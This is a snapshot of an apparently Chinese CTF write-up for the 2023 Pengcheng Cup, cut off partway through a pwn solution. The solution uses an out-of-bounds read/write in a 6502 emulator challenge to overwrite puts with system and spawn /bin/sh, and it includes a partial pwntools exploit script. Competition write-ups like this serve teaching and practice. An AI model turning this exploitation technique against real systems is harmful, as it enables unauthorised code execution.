看啥推荐读物
专栏名称: 星盟安全
星盟安全工作室---“VENI VIDI VICI”(我来,我见,我征服),我们的征途是星辰大海。从事各类安全研究,专注于知识分享。
今天看啥  ›  专栏  ›  星盟安全

2023 鹏城杯WP

星盟安全  · 公众号  ·  · 2023-11-22 15:56
01PWN1.6502越界读写,把 puts 改 system然后最好输入一下 /bin/sh 就可以了:from pwn import *context.log_level="debug"#p=process("./6502_proccessor")p=remote("172.10.0.7",10002)#gdb.attach(p,"b *$rebase(0x59FA)\nb *$rebase(0x5958)")#pause()payload=b""payload+=b"\xad\x42\xdf"#get libcpayload+=b"\x69\xb0"#add 0x92payload+=b"\x8d\xf2\xde"#write ac to nop_codepayload+=b"\xad\x43\xdf"#get libcpayload+=b"\x69\xed"#add 0xecpayload+=b"\x8d\xf3\xde"#write ac to nop_codepayload+=b"\xad\x44\xdf"#get libcpayload+=b"\x69\x01"#add 0xecpayload+=b"\x8d\xf4\xde"#write ac to nop_codepayload+=b"\xad\x45\xdf"#get libcpayload+=b"\x8d\xf5\xde"#write ac to nop_codepayload+=b"\xad\x46\xdf"#get libcpayload+=b"\x8d\xf6\xde"#write ac to nop_codepayload+=b"\xad\x47\xdf"#get libcpayload+=b"\x8d\xf7\xde"#write ac to nop_codepayload+=b"\xad\x44\xdf"#get libcpayload+=b"\x69\x01"#add 0xecpayload+=b"\x8d\xf4\xde"#write ac to nop_codepayload+=b"\xfc"#nopp.recvuntil("length:")p.sendline(str(len(payload)) ………………………………

原文地址:访问原文地址
快照地址: 访问文章快照